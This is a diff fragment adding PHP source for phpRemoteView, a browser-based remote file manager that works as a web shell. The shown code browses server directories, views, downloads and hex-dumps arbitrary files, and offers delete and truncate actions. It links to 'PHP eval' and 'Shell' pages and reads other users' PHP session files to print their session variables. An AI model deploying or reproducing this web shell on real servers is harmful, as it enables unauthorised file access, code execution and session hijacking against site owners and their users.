+[<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=2&fnot=1><b>".mm("Image")."</b></a>]
+[<a href=$self/".urlencode($notepad)."?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=3&fnot=1&fatt=".urlencode($notepad)."><b>".mm("Notepad")."</b></a>]
+[<a href=$self/".urlencode($f)."?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=3&fnot=1><b>".mm("DOWNLOAD")."</b></a>]
+[<a href=$self?c=e&d=".urlencode($d)."&f=".urlencode($f)."><b>".mm("Edit")."</b></a>]
+</small>";
+}
+
+
+function exitw() {
+exit("<table width=100% border=0 cellspacing=2 cellpadding=0 bgcolor=#ffdddd>
+<tr><td align=center>
+".mm("Sorry, this programm run in read-only mode.")."<br>
+".mm("For full access: write")." `<tt><nobr><b>\$write_access=<u>true</u>;</b></nobr></tt>` 
+".mm("in this php-file").".</td></tr></table>
+");
+}
+
+
+
+function ob() {
+   global $obb_flag, $obb;
+   if (!isset($obb_flag)) { $obb_flag=0; $obb=false; }
+   if (function_exists("ob_start")) {
+      if ($GLOBALS['obb_flag']) ob_end_clean();
+      ob_start();
+      $GLOBALS['obb_flag']=1;
+   }
+}
+
+function obb() {
+   global $obb;
+   if (function_exists("ob_start")) {
+      $obb=ob_get_contents();
+      ob_end_clean();
+      $obb="<P>
+<table bgcolor=#ff0000 width=100% border=0 cellspacing=1 cellpadding=0><tr><td>
+<table bgcolor=#ccccff width=100% border=0 cellspacing=0 cellpadding=3><tr><td align=center>
+<b>".mm("Reason").":</b></td></tr></table>
+</td></tr><tr><td>
+<table bgcolor=#ffcccc width=100% border=0 cellspacing=0 cellpadding=3><tr><td>
+$obb<P>
+</td></tr></table>
+</table><P>";
+      $GLOBALS['obb_flag']=0;
+   }
+}
+
+function sizeparse($size) {
+   return strrev(preg_replace("!...!","\\0 ",strrev($size)));
+}
+
+
+function jsval($msg) {
+   $msg=str_replace("\\","\\\\",$msg);
+   $msg=str_replace("\"","\\\"",$msg);
+   $msg=str_replace("'","\\'",$msg);
+   return '"'.$msg.'",';
+}
+
+
+
+///////////////////////////////////////////////////////////////////////////
+
+
+switch($c) {
+
+
+// listing
+case "l":
+
+   echo $GLOBALS['html'];
+
+   if (!realpath($d)) die("".mm("Error path").". <a href=$self>".mm("Click here for start")."</a>.");
+
+   //up($d);
+   
+   ob();
+   $di=dir($d);
+   obb();
+
+   $dirs=array();
+   $files=array();
+
+   if (!$di) exit("<a href=$self?&c=l&d=".urlencode(realpath($d."..")).
+      "><nobr>&lt;&lt;&lt; <b>".mm("up directory")."</b> &gt;&gt;&gt;</nobr></a> <p>".
+      "<font color=red><b>".mm("access denied")."</b></font>: $obb");
+   while (false!==($name=$di->read())) {
+      if ($name=="." || $name=="..") continue;
+      if (@is_dir($d.$name)) { 
+         $dirs[]=strval($name);
+         $fstatus[$name]=0;
+      }
+      else {
+         $files[]=strval($name);
+         $fstatus[$name]=1;
+      }
+      $fsize[$name]=@filesize($d.$name);
+      $ftype[$name]=@filetype($d.$name);
+      if (!is_int($fsize[$name])) { $ftype[$name]='?'; $fstatus[$name]=1; }
+      $fperms[$name]=@fileperms($d.$name);
+      $fmtime[$name]=@filemtime($d.$name);
+      $fatime[$name]=@fileatime($d.$name);
+      $fctime[$name]=@filectime($d.$name);
+      $fowner[$name]=@fileowner($d.$name);
+      $fgroup[$name]=@filegroup($d.$name);
+      if (preg_match("!^[^.].*\.([^.]+)$!",$name,$ok)) 
+         $fext[$name]=strtolower($ok[1]); 
+      else 
+         $fext[$name]="";
+   }
+   $di->close();
+
+   $listsort=array();
+   if (count($dirs))
+   foreach ($dirs as $v) {
+       switch ($cc[0]) {
+          case "e": $listsort[$v]=$fext[$v].' '.$v; break;
+          case "n": $listsort[$v]=strtolower($v); break;
+          default:
+             switch ($cn[$cc[0]]) {
+                case "t": case "s": case "n": $listsort[$v]=strtolower($v); break;
+                case "o": $listsort[$v]=$fowner[$v]; break;
+                case "g": $listsort[$v]=$fgroup[$v]; break;
+                case "a": $listsort[$v]="$fowner[$v] $fgroup[$v]"; break;
+                case "c": $listsort[$v]=$fperms[$v]; break;
+                case "1": $listsort[$v]=$fctime[$v]; break;
+                case "2": $listsort[$v]=$fmtime[$v]; break;
+                case "3": $listsort[$v]=$fatime[$v]; break;
+          
+             }
+      }
+   }
+
+   $names=$listsort;
+   //echo "<pre>";print_r($names);
+   if ($cc[1]) arsort($names); else asort($names);
+   //echo "<pre>";print_r($names);
+
+   $listsort=array();
+   if (count($files))
+   foreach ($files as $v) {
+       $v=strval($v);
+       switch ($cc[0]) {
+          case "e": $listsort[$v]=$fext[$v].' '.$v; break;
+          case "n": $listsort[$v]=strtolower($v); break;
+          default:
+             switch ($cn[$cc[0]]) {
+                case "n": $listsort[$v]=strtolower($v); break;
+                case "t": $listsort[$v]=$ftype[$v]; break;
+                case "s": $listsort[$v]=$fsize[$v]; break;
+                case "o": $listsort[$v]=$fowner[$v]; break;
+                case "g": $listsort[$v]=$fgroup[$v]; break;
+                case "a": $listsort[$v]="$fowner[$v] $fgroup[$v]"; break;
+                case "c": $listsort[$v]=$fperms[$v]; break;
+                case "1": $listsort[$v]=$fctime[$v]; break;
+                case "2": $listsort[$v]=$fmtime[$v]; break;
+                case "3": $listsort[$v]=$fatime[$v]; break;
+          
+             }
+      }
+   }
+
+
+   //echo "<pre>DIRS:"; print_r($names);
+   if ($cc[1]) arsort($listsort); else asort($listsort);
+   //$names=array_merge($names,$listsort);
+   foreach ($listsort as $k=>$v) $names[$k]=$v;
+   //echo "<pre>FILES:"; print_r($listsort);
+   //echo "<pre>NAMES:"; print_r($names);
+
+?>
+<STYLE>
+.title {
+color: 'black';
+background: #D4D0C8;
+text-align: 'center';
+BORDER-RIGHT:   #888888 1px outset;
+BORDER-TOP:     #ffffff 2px outset;
+BORDER-LEFT:    #ffffff 1px outset;
+BORDER-BOTTOM:  #888888 1px outset;
+}
+.window {
+BORDER-RIGHT:  buttonhighlight 2px outset;
+BORDER-TOP:    buttonhighlight 2px outset;
+BORDER-LEFT:   buttonhighlight 2px outset;
+BORDER-BOTTOM: buttonhighlight 2px outset;
+FONT: 8pt Tahoma, Verdana, Geneva, Arial, Helvetica, sans-serif;
+BACKGROUND-COLOR: #D4D0C8;
+CURSOR: default;
+}
+.window1 {
+BORDER-RIGHT:  #eeeeee 1px solid;
+BORDER-TOP:    #808080 1px solid;
+BORDER-LEFT:   #808080 1px solid;
+BORDER-BOTTOM: #eeeeee 1px solid;
+FONT: 8pt Tahoma, Verdana, Geneva, Arial, Helvetica, sans-serif;
+}
+.line {
+BORDER-RIGHT:   #cccccc 1px solid;
+BORDER-TOP:     #ffffff 1px solid;
+BORDER-LEFT:    #ffffff 1px solid;
+BORDER-BOTTOM:  #cccccc 1px solid;
+font: <?php echo $cp[4]; ?>pt <?php echo $cp[3]; ?>;
+}
+.line2 {
+background: #ffffcc;
+}
+.black {color: black}
+a:link.black {color: black}
+a:active.black {color: black}
+a:visited.black {color: black}
+a:hover.black {color: #0000ff}
+
+.white {color: white}
+a:link.white{color: white}
+a:active.white{color: white}
+a:visited.white{color: white}
+a:hover.white{color: #ffff77}
+
+a:link     {color: #000099;}
+a:active   {color: #000099;}
+a:visited  {color: #990099;}
+a:hover    {color: #ff0000;}
+a {
+CURSOR: default;
+}
+.windowtitle {
+font: 9pt; Tahoma, Verdana, Geneva, Arial, Helvetica, sans-serif;
+font-weight: bold;
+color: white;
+}
+.sym {
+font: 14px Wingdings;
+}
+</STYLE>
+
+<?php
+
+function up2($d) {
+   global $win,$self;
+   $d=str_replace("\\","/",$d);
+   if (substr($d,-1)!="/") $d.="/";
+   $d=str_replace("//","/",$d);
+
+   $n=explode("/",$d);
+   unset($n[count($n)-1]);
+
+   $path="";
+   for ($i=0; $i<count($n); $i++) {
+      $path="$path$n[$i]/";
+      if ($i==0) $path=strtoupper($path);
+      $paths[]=$path;
+   }
+
+   $out="";
+   $sum=0;
+   $gr=70;
+   for ($i=0; $i<count($n); $i++) {
+      $out.="<a href=$self?c=l&d=".urlencode($paths[$i])." class=white>";
+      if (strlen($d)>$gr && $i>0 && $i+1<count($n)) {
+         if (strlen($d)-$sum>$gr) {
+            $out.="��";
+            $sum+=strlen($n[$i]);
+         }
+         else 
+            $out.=$n[$i];
+      }
+      else 
+         if ($i==0) $out.=strtoupper($n[$i]); else $out.=$n[$i];
+      $out.="/</a>";
+
+   }
+
+   return $out;
+   return "<font size=-2>$d</font>";
+}
+
+$ext=array();
+$ext['html']=array('html','htm','shtml');
+$ext['txt']=array('txt','ini','conf','','bat','sh','tcl','js','bak','doc','log','sfc','c','cpp','h','cfg');
+$ext['exe']=array('exe','com','pif','src','lnk');
+$ext['php']=array('php','phtml','php3','php4','inc');
+$ext['img']=array('gif','png','jpeg','jpg','jpe','bmp','ico','tif','tiff','avi','mpg','mpeg');
+
+
+   echo "\n\n\n<script>\nfunction tr(";
+   for ($i=0; $i<strlen($cn); $i++) {
+      echo "a$i,";
+   }
+   echo "x) {\ndocument.write(\"<tr bgcolor=#eeeeee";
+//   echo " onMouseOver='this.style.value=\\\"line2\\\"' onMouseOut='this.style.value=\\\"line\\\"'>";
+   echo " onMouseOver='this.style.backgroundColor=\\\"#FFFFCC\\\"' onMouseOut='this.style.backgroundColor=\\\"\\\"'>";
+   for ($i=0; $i<strlen($cn); $i++) {
+      echo '<td align='.$cn_align[$cn[$i]].' class=line ';
+      switch ($cn[$i])  {
+         case 's': case 'c':  case '1':  case '2':  case '3': case 't':
+            echo ' nowrap'; 
+      }
+      echo ">";
+      if ($cn[$i]!='t' && $cn[$i]!='n') echo "\xA0";
+      echo "\"+a$i+\"";
+      if ($cn[$i]!='t' && $cn[$i]!='n') echo "\xA0";
+      echo "</td>";
+   }
+   echo "</tr>\");\n}";
+   echo "\n\n</script>\n\n\n";
+
+
+   //phpinfo();
+   //echo implode(" | ",$cp);
+   echo '<table border=0 cellspacing=2 cellpadding=0 bgcolor=#cccccc 
+      class=window align=center width=60%><form name=main>';
+
+   echo '<tr><td colspan='.strlen($cn).' bgcolor=#0A246A background="'.
+   $self.'?c=img&name=fon&r=" class=windowtitle>';
+
+         echo '<table width=100% border=0 cellspacing=0 cellpadding=2 class=windowtitle><tr><td>'.
+         '<a href='.$self.'><img src='.$self.'?c=img&name=dir border=0></a>'.
+         up2($d.$f).'</td></tr></table>';
+
+   echo '</td></tr>'.
+   '<tr><td>'.
+   '<table width=100% border=0 cellspacing=0 cellpadding=0 class=window1><tr>';
+
+   $button_help=array(
+   'up'=>"UP DIR",
+   'refresh'=>"RELOAD",
+   'mode'=>'SETUP, folder option',
+   'edit'=>'DIR INFO',
+   'home'=>'HomePage',
+   'papki'=>'TREE',
+   'setup'=>'PHP eval, Shell',
+   'back'=>'BACK',
+   );
+
+   function button_url($name) {
+      global $self,$d,$f,$uurl;
+      switch ($name) {
+         case 'up': return "$self?c=l&d=".urlencode(realpath($d.".."));
+         case 'refresh': return "$self?c=l&r=".rand(0,10000)."&d=".urlencode($d);
+         case 'mode': return "$self?c=setup&ref=$uurl";
+         case 'edit': return "$self?c=d&d=".urlencode($d);
+         case 'home': return "http://php.spb.ru/remview/";
+         case 'papki': return "$self?c=tree&d=".urlencode($d);
+         case 'setup': return "$self?c=t";
+         case 'back': return "javascript:history.back(-1)";
+      }
+   }
+   echo '<td colspan='.strlen($cn).'>
+   <table border=0 cellspacing=0 cellpadding=2><tr>';
+   $buttons=array('back','up','refresh','edit','mode','disk','full','papki','setup','home');
+   $tmp=strtoupper($d[0]);
+   for ($i=0; $i<count($buttons); $i++) {
+      if ($buttons[$i]=='full') {
+         echo '<td class=window width=90% align=center nowrap><font color=#999999 face="Arial Black" 
+         style="font-size: 11pt;">&lt;?php<u>R</u>emote<u>V</u>iew?&gt;</font></td>';
+         continue;
+      }
+      if ($buttons[$i]=='disk') {
+         if (!$win) continue;
+         echo '<td width=1% title=\'Select dist\' class=window onMouseOver="this.style.backgroundColor=\'#eeee88\'" '.
+              ' onMouseOut="this.style.backgroundColor=\'\'">';
+         echo "<select name=disk size=1; style='font: 9pt Arial Black; color: #999999 '
+         onChange='location.href=\"$self?c=l&d=\"+document.main.disk.options[document.main.disk.selectedIndex].value+\":/\"'>";
+         for ($j=ord('A'); $j<=ord('Z'); $j++) 
+            echo '<option value="'.chr($j).'"'.(chr($j)==$tmp?" selected":"").'>'.chr($j);
+         echo "</select></td>";
+         continue;
+      }
+      $bturl=button_url($buttons[$i]);
+      echo '<td width=1% title=\''.$button_help[$buttons[$i]].'\' class=window'.
+           ' onMouseMove="this.style.backgroundColor=\'#eeee88\';window.status=\'** '.$button_help[$buttons[$i]].' ** '.$bturl.'\'"'.
+           ' onMouseOut="this.style.backgroundColor=\'\';window.status=\'\'"'.
+           ' onClick=\'location.href="'.$bturl.'"\'><a href=';
+      echo button_url($buttons[$i]);
+      echo '><img HSPACE=3 border=0 src='.$self.'?c=img&name='.$buttons[$i].'></a></td>';
+   }
+   echo '</tr></table>
+   </td></tr><tr>';
+
+
+   for ($i=0; $i<strlen($cn); $i++) {
+      echo "<td nowrap class=title onClick='location.href=\"".
+           "$self?c=set&c2=sort&name=$i&pan=$panel&ref=$uurl\"'";
+      switch ($cn[$i]) {
+         case 1: case 2: case 3: case "s": echo " width=13%"; break;
+         case 't': echo " width=2%"; break;
+         case 'n': echo " width=40%"; break;
+      }
+      echo "><a href='$self?c=set&c2=sort&name=$i&pan=$panel&ref=$uurl' class=black>";
+      switch ($cn[$i]) {
+         case "n": case "t": case "s": case "o": case "g": 
+         case "a": case "c": case "1": case "2": case "3": 
+            echo "\xA0".$cn_name[$cn[$i]]."\xA0"; break;
+         default: 
+            echo "??$cn[$i]??";
+      }
+      if ($cc[0]==="$i") {
+         if ($cc[1]=='0') echo "<img src=$self?c=img&name=sort_asc border=0>";
+         else echo "<img src=$self?c=img&name=sort_desc border=0>";
+      }
+      echo '</a></td>';
+   }
+   echo '</tr>';
+   
+   echo "\n\n<script>\n\n";
+   foreach ($names as $k=>$v) {
+
+      echo "\n\n// $k \n";
+      echo 'tr(';
+      
+      for ($i=0; $i<strlen($cn); $i++) {
+
+         switch ($cn[$i]) {
+         
+            case 'n': 
+               switch($ftype[$k]) {
+               case 'file':
+                  $vv=strtolower(substr($k,strlen($k)-4,4));
+                  $add="";
+                  if ($vv==".gif" || $vv==".jpg" || $vv==".png" || $vv==".bmp"
+                     || $vv==".ico" || $vv=="jpeg") $add="&ftype=2&fnot=1";
+                  if (substr($k,0,5)=="sess_") $add="&ftype=4";
+                  $ln='<a href='.$self.'?&c=v&d='.urlencode($d).
+                  '&f='.urlencode($k).$add.'>';
+                  break;
+
+               default:
+                  $ln='<a href='.$self.'?&c=l&d='.urlencode($d.$k).'>';
+                  break;
+               }
+               
+               if ($ftype[$k]=='dir') 
+                  $ln.='<img src='.$self.'?c=img&name=dir border=0>';
+               else {
+                  $found=0;
+                  foreach ($ext as $kk=>$vv) {
+                     if (in_array(strtolower($fext[$k]),$vv)) {
+                        $ln.='<img src='.$self.'?c=img&name='.$kk.' border=0>';
+                        $found=1;
+                        break;
+                     }
+                  }
+                  if (!$found)
+                     $ln.='<img src='.$self.'?c=img&name=unk border=0>';
+               }
+               $ln.=substr($k,0,48).'</a>';
+               echo jsval($ln);
+
+               break; 
+
+            case "t": 
+               switch ($ftype[$k]) {
+               case "dir":
+                  echo jsval("<a href=$self?c=d&d=".urlencode($d.$k).">DIR</a>"); 
+                  break;
+               case "file":
+                  echo jsval("<a href=$self/".urlencode($k)."?&c=v&fnot=1&ftype=3&d=".
+                     urlencode($d)."&f=".urlencode($k)." class=sym>\xF2</a> ".
+                     "<a href=$self?&c=i&d=".urlencode($d)."&f=".urlencode($k)." class=sym>\xF0</a>");
+                  break;
+               case "link":
+                  echo jsval("<font class=t>&#8212;&gt;</font>");
+                  break;
+               default:
+                  echo jsval("??");
+                  break;
+               }
+               break;
+            
+            case "s": 
+               if ($ftype[$k]=='file') echo jsval(sizeparse($fsize[$k])); 
+               else echo jsval(''); 
+               break;
+            
+            case "o": 
+               $tmp=@_posix_getpwuid($fowner[$k]);
+               if (!isset($tmp['name']) || $tmp['name']=="") $tow=$fowner[$k];
+               else $tow=$tmp['name'];
+               echo jsval($tow);
+               break;
+            
+            case "g": 
+               $tmp2=@_posix_getgrgid($fgroup[$k]);
+               if (!isset($tmp2['name']) || $tmp2['name']=="") $tgr=$fgroup[$k];
+               else $tgr=$tmp2['name'];
+               echo jsval($tgr);
+               break;
+            
+            case "a": 
+               $tmp=@_posix_getpwuid($fowner[$k]);
+               if (!isset($tmp['name']) || $tmp['name']=="") $tow=$fowner[$k];
+               else $tow=$tmp['name'];
+               $tmp2=@_posix_getgrgid($fgroup[$k]);
+               if (!isset($tmp2['name']) || $tmp2['name']=="") $tgr=$fgroup[$k];
+               else $tgr=$tmp2['name'];
+               echo jsval("$tow/$tgr");
+               break;
+
+            case "c": 
+               echo jsval(display_perms($fperms[$k])); break;
+            
+            case "1": echo jsval(date($cp[2],$fctime[$k])); break;
+            
+            case "2": echo jsval(date($cp[2],$fmtime[$k])); break;
+            
+            case "3": echo jsval(date($cp[2],$fatime[$k])); break;
+
+            default: echo "??$cn[$i]??";
+
+         } //switch ($ftype)
+      
+      }//for ($cn)
+      
+      echo "0);\n";
+
+   }//foreach ($names)
+   
+   echo "\n\n</script>\n\n\n";
+   
+   echo '</td></tr></table></td></tr></table></td></tr></table>';
+
+
+   echo "<P align=center>
+   <font size=1 style='Font: 8pt Verdana'><B>
+   <a href=$self?c=setup&ref=$uurl>".mm("Setup")."</a> | 
+   <a href=$self?c=t>PHP eval</a> | 
+   <a href=$self?c=phpinfo>phpinfo()</a> | 
+   <a href=$self?c=t>Shell</a> | 
+   <a href=$self?c=codes>".mm("Char map")."</a> |
+   ".mm("Language").": 
+   <a href=$self?c=set&c2=eng&ref=$uurl&pan=0>".mm("English")."</a>/<a href=$self?c=set&c2=rus&ref=$uurl&pan=0>".mm("Russian")."</a>
+   
+   </b>
+   <hr size=1 noshade width=55%><center>
+
+   <table border=0 cellspacing=0 cellpadding=0><tr><td width=32>
+   <font face=webdings style='Font-size: 22pt;'>&#0033;</font></td><td>
+   <font size=1 style='Font: 8pt Verdana'>phpRemoteView &copy; Dmitry Borodin (".mm("version")." $version)<br>
+   ".mm("Free download")." - <a href='http://php.spb.ru/remview/'>http://php.spb.ru/remview/</a></b></font></td>
+   </tr></table>";
+
+break;
+
+
+case "set": 
+
+   switch ($c2) {
+      case "sort":
+         $name=intval($name);
+         if ($name==$cc[0]) if ($cc[1]==='0') $cc[1]='1'; else $cc[1]='0';
+         $cc[0]=$name;
+         break;
+
+      case "panel":
+         $cn='';
+         foreach ($names as $k=>$v) {
+            if ($v!="") $cn.=substr($v,0,1);
+         }
+         $cc[0]=substr($sort,0,1);
+         $cc[1]=substr($sortby,0,1);
+         $cp[2]=substr($datetime,0,50);
+         $cp[3]=substr($fontname,0,50);
+         $cp[4]=substr($fontsize,0,50);
+
+         //exit("cn=$cn<br>cc=$cc");
+         break;
+
+      case "eng":
+         $cc[5]=1;
+         break;
+
+      case "rus":
+         $cc[5]=2;
+         break;
+
+   }
+
+
+   $cookie=$cc."~".$cn."~".$cp[2]."~".$cp[3]."~".$cp[4];
+   if ($c2=="reset") $cookie=implode("~",$cp_def);
+   //echo "<script>alert('$cookie')</script>";
+   setcookie("cp$pan",$cookie,time()+24*60*60*333,'/');
+   header("Location: $ref");
+   echo "<script>location.href=\"$ref\";</script>";
+   //echo "[$ref]";
+   //phpinfo();
+   break;
+
+
+case "setup": 
+
+   echo $GLOBALS['html'];
+
+   echo "<center><h3><b>phpRemoteView ".mm("setup")."</b> [<A href='javascript:history.go(-1)'>".mm("back")."</a>]</h3></center><hr size=1 noshade>";
+
+   echo "<STYLE>
+   .setup {
+      font-size: 8pt;
+      font-family: Tahoma;
+   }
+   HTML, TD {font: 90%}
+   </STYLE>";
+
+   echo "
+   <b><u>".mm("Reset all settings")."</u></b>: <a href=$self?c=set&c2=reset&pan=$panel&ref=$ref>".mm("clear")."</a>";
+   echo " <font color=white>(".mm("Current").": <small>".implode(" | ",$cp)."</small>)</font><P>";
+
+   echo "
+   <form action=$self method=post>
+   <input type=hidden name=c value=\"set\">
+   <input type=hidden name=c2 value=\"panel\">
+   <input type=hidden name=pan value=\"$panel\">
+   <input type=hidden name=ref value=\"$ref\">
+   ";
+   echo "<b><u>".mm("Colums and sort")."</u></b><br>";
+
+   echo "".mm("Sort order").": ";
+   echo "<input type=radio name=sortby value=0 id=q3 ".($cc[1]=='0'?"checked":"").">";
+   echo "<label for=q3>".mm("Ascending sort")."</label>";
+   echo "<input type=radio name=sortby value=1 id=q4 ".($cc[1]=='1'?"checked":"").">";
+   echo "<label for=q4>".mm("Descending sort")."</label><br>";
+
+   echo "<input type=radio name=sort value='n' id=q1 ".($cc[0]=='n'?"checked":"").">";
+   echo "<label for=q1>".mm("Sort by filename")."</label>";
+   echo "<input type=radio name=sort value='e' id=q2 ".($cc[0]=='e'?"checked":"").">";
+   echo "<label for=q2>".mm("Sort by filename extension")."</label>";
+   echo "<table border=0 cellspacing=0 cellpadding=3>";
+   for ($i=0; $i<2; $i++) {
+      echo "<tr>";
+      for ($j=0; $j<7; $j++) {
+         $n=$j+$i*7;
+         echo "<td align=center><label for=$n>Sort by ".($n+1)."</label>";
+         echo "<input type=radio name=sort value=$n id=$n ".($cc[0]=="$n"?"checked":"").">";
+         echo "<br><select class=setup name=names[] size=".(count($cn_name)+1).">";
+         echo "<option value=''>--hidden--";
+         foreach ($cn_name as $kk=>$vv) 
+            echo "<option value='$kk'".($n<strlen($cn) && $cn[$n]==$kk?" selected":"").">$vv";
+         echo "</select>";
+      }
+      echo "</tr>";
+   }
+   echo "</table><P>";
+
+   echo "<b><u>".mm("Date/time format")."</u></b>: <input type=text name=datetime value=\"$cp[2]\"><br>
+   d - day, m - month, y - year2, Y - year4, H - hour, m - minute, s - second<P>";
+
+   echo "<b><u>".mm("Panel font & size")."</u></b>: 
+   <input type=text name=fontname value=\"$cp[3]\" size=12> 
+   <input type=text name=fontsize value=\"$cp[4]\" size=2>pt<P>";
+
+   echo "<P><center><input type=submit value='&nbsp; &nbsp; S &nbsp; U &nbsp; B &nbsp; M &nbsp; I &nbsp; T &nbsp; &nbsp;'></center></form>";
+
+   
+   echo "<hr size=1 noshade>";
+   break;
+
+
+
+// view
+case "v":
+
+
+   if (!isset($fnot)) $fnot=0;
+   if (!isset($ftype)) $ftype=0;
+   
+   if ($fnot==0) {
+      echo $GLOBALS['html'];
+      up($d,$f);
+      echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr>&lt;&lt;&lt;<b>".mm("back to directory")."</b> &gt;&gt;&gt;</nobr></a>";
+      up_link($d,$f);
+      echo "<hr size=1 noshade>";
+   }      
+   if (!realpath($d.$f) || !file_exists($d.$f)) exit("".mm("file not found")."");
+   if (!is_file($d.$f) || !$fi=@fopen($d.$f,"rb")) exit("<p><font color=red><b>".mm("access denied")."</b></font>");
+
+   if ($ftype==0 || $ftype==4) {
+      $buf=fread($fi,max(filesize($d.$f),$maxsize_fread));
+      fclose($fi);
+   }
+
+
+   switch ($ftype) {
+
+   case 0: 
+      echo "<pre>".htmlspecialchars($buf)."</pre>";
+      break;
+
+   case 1: 
+      readfile($d.$f); 
+      break;
+
+   case 2: 
+      header("Content-type: image/gif"); 
+      readfile($d.$f); 
+      break;
+
+   case 3: // download
+
+      if (isset($fatt) && strlen($fatt)>0) {
+          $attach=$fatt; 
+          header("Content-type: text/plain"); 
+      } 
+      else {
+          $attach=$f;
+          header("Content-type: phpspbru"); 
+      }
+      header("Content-disposition: attachment; filename=\"$attach\";"); 
+      readfile($d.$f); 
+      break;
+
+   case 4: // session
+   
+      echo "<xmp>";
+      if (substr($f,0,5)=="sess_" && preg_match("!^sess_([a-z0-9]{32})$!i",$f,$ok)) {
+         ini_set("session.save_path",$d);
+         session_id($ok[1]);
+         session_start();
+         print_r($HTTP_SESSION_VARS);
+      }
+      else {
+         print_r(unserialize($buf));
+      }
+      echo "</xmp>";//<hr size=1 noshade><xmp>";
+      break;
+
+   }
+
+   break;
+
+
+
+
+
+
+
+case "i": // information for FILE
+
+   echo $GLOBALS['html'];
+   up($d,$f);
+   echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr>&lt;&lt;&lt;<b>".mm("back to directory")."</b> &gt;&gt;&gt;</nobr></a>";
+   up_link($d,$f);
+
+   if (!realpath($d.$f) || !file_exists($d.$f)) exit(mm("file not found"));
+
+   echo "<P><big><b><tt>".htmlspecialchars($d.$f)."</tt></b></big><P>";
+   echo "<table class=tab border=0 cellspacing=1 cellpadding=2>";
+   echo "<tr class=tr><td>".mm("Size")."        </td><td> ".filesize($d.$f)."</td></tR>";
+   echo "<tr class=tr><td>".mm("Owner")."/".mm("Group")." </td><td> ";      
+   $tmp=@_posix_getpwuid(fileowner($d.$f));
+   if (!isset($tmp['name']) || $tmp['name']=="") echo fileowner($d.$f)." ";
+   else echo $tmp['name']." ";
+   $tmp=@_posix_getgrgid(filegroup($d.$f));
+   if (!isset($tmp['name']) || $tmp['name']=="") echo filegroup($d.$f);
+   else echo $tmp['name'];
+   echo "<tr class=tr><td>".mm("FileType")."    </td><td> ".filetype($d.$f)."</td></tr>";
+   echo "<tr class=tr><td>".mm("Perms")."       </td><td> ".display_perms(fileperms($d.$f))."</td></tr>";
+   echo "<tr class=tr><td>".mm("Create time")." </td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr>";
+   echo "<tr class=tr><td>".mm("Access time")." </td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr>";
+   echo "<tr class=tr><td>".mm("MODIFY time")." </td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr>";
+   echo "</table><P>";
+
+   $fi=@fopen($d.$f,"rb");
+   if ($fi) {
+      $str=fread($fi,$hexdump_lines*$hexdump_rows);
+      echo "<b>".mm("HEXDUMP PREVIEW")."</b>";
+      $n=0;
+      $a0="00000000<br>";
+      $a1="";
+      $a2="";
+      for ($i=0; $i<strlen($str); $i++) {
+         $a1.=sprintf("%02X",ord($str[$i])).' ';
+         switch (ord($str[$i])) {
+            case 0:  $a2.="<font class=s2>0</font>"; break;
+            case 32: 
+            case 10:
+            case 13: $a2.="&nbsp;"; break;
+            default:  $a2.=htmlspecialchars($str[$i]);
+         }
+         $n++;
+         if ($n==$hexdump_rows) {
+            $n=0;
+            if ($i+1<strlen($str)) $a0.=sprintf("%08X",$i+1)."<br>";
+            $a1.="<br>";
+            $a2.="<br>";
+         }
+      }
+      //if ($a1!="") $a0.=sprintf("%08X",$i)."<br>";
+      echo "<table border=0 bgcolor=#cccccc cellspacing=1 cellpadding=4 ".
+         "class=sy><tr><td bgcolor=#e0e0e0>$a0</td><td bgcolor=white>".
+         "$a1</td><td bgcolor=white>$a2</td></tr></table><p>";
+   }
+   
+   echo "<b>Base64: </b>
+   <nobr>[<a href=$self?c=base64&c2=0&d=".urlencode($d)."&f=".urlencode($f).">Encode</a>]&nbsp;</nobr>
+   <nobr>[<a href=$self?c=base64&c2=1&d=".urlencode($d)."&f=".urlencode($f).">+chunk</a>]&nbsp;</nobr>
+   <nobr>[<a href=$self?c=base64&c2=2&d=".urlencode($d)."&f=".urlencode($f).">+chunk+quotes</a>]&nbsp;</nobr>
+   <nobr>[<a href=$self?c=base64&c2=3&d=".urlencode($d)."&f=".urlencode($f).">Decode</a>]&nbsp;</nobr>
+   <P>";
+
+
+   if (!$write_access) exitw();
+
+   $msg="";
+   if (!is_file($d.$f) || !$fi=@fopen($d.$f,"r+")) $msg=" (<font color=red><b>".mm("ONLY READ ACCESS")."</b></font>)";
+   else fclose($fi);
+   if (!is_file($d.$f) || !$fi=@fopen($d.$f,"r")) $msg=" (<font color=red><b>".mm("Can't READ file - access denied")."</b></font>)";
+   else fclose($fi);
+   if ($msg=="") $msg=" (".mm("full read/write access").")";
+
+   echo "<b>".mm("FILE SYSTEM COMMANDS")."$msg</b><p>";
+
+   echo "
+<table border=0 cellspacing=0 cellpadding=0><tr>
+
+<td bgcolor=#cccccc><a href=$self?c=e&d=".urlencode($d)."&f=".urlencode($f).
+"><b>&nbsp;&nbsp;".mm("EDIT")."&nbsp;&nbsp;<br>&nbsp;&nbsp;".mm("FILE")."&nbsp;&nbsp;</b></a></td>
+<td>&nbsp;&nbsp;&nbsp;</td>
+
+<td><form action=$self method=post>
+<input type=hidden name=c value=delete>
+<input type=hidden name=c2 value=delete>
+<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+<input type=hidden name=f value=\"".htmlspecialchars($f)."\">
+<input type=submit value='".mm("DELETE")."'><small>&gt;</small><input type=checkbox name=confirm value=delete></nobr><br>
+<small>".mm("Delete this file")."</small>
+</td><td></form></td><td>&nbsp;&nbsp;&nbsp;</td>
+
+<td><form action=$self method=post>
+<input type=hidden name=c value=delete>
+<input type=hidden name=c2 value=clean>
+<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+<input type=hidden name=f value=\"".htmlspecialchars($f)."\">
+<input type=submit value='".mm("CLEAN")."'><small>&gt;</small><input type=checkbox name=confirm value=touch></nobr><br>
+<small>".mm("filesize to 0byte")."</small>
+</td><td></form></td><td>&nbsp;&nbsp;&nbsp;</td>
+
+<td><form action=$self method=post>
+<input type=hidden name=c value=delete>
+<input type=hidden name=c2 value=touch>
+<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+<input type=hidden name=f value=\"".htmlspecialchars($f)."\">
